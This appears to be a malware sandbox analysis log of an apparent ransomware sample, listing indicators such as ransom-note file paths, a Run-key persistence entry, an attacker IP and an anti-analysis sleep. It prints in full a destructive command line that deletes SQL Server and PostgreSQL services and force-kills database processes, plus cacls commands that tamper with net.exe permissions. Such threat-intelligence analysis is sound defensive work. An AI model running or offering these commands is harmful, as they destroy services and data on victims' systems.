cmdline | "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe |
cmdline | cacls C:\Windows\system32\net.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d system |
buffer | Buffer with sha1: 756847f2cd284fbf7fed76babd9e4f7a52e72dd7 |
host | 80.66.75.37 |
file | C:\Users\All Users\Microsoft\Microsoft Antimalware\FILE RECOVERY.txt |
file | C:\Documents and Settings\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\FILE RECOVERY.txt |
file | C:\Documents and Settings\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\FILE RECOVERY.txt |
file | C:\Documents and Settings\All Users\Microsoft\Microsoft Antimalware\FILE RECOVERY.txt |
file | C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\FILE RECOVERY.txt |
file | C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\FILE RECOVERY.txt |
description | Zqbpytwp.exe tried to sleep 2728293 seconds, actually delayed analysis time by 2728293 seconds |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Hvrodssun | reg_value | C:\Users\test22\AppData\Roaming\Hvrodssun.exe |
file | C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\CP_Common\FILE RECOVERY.txt |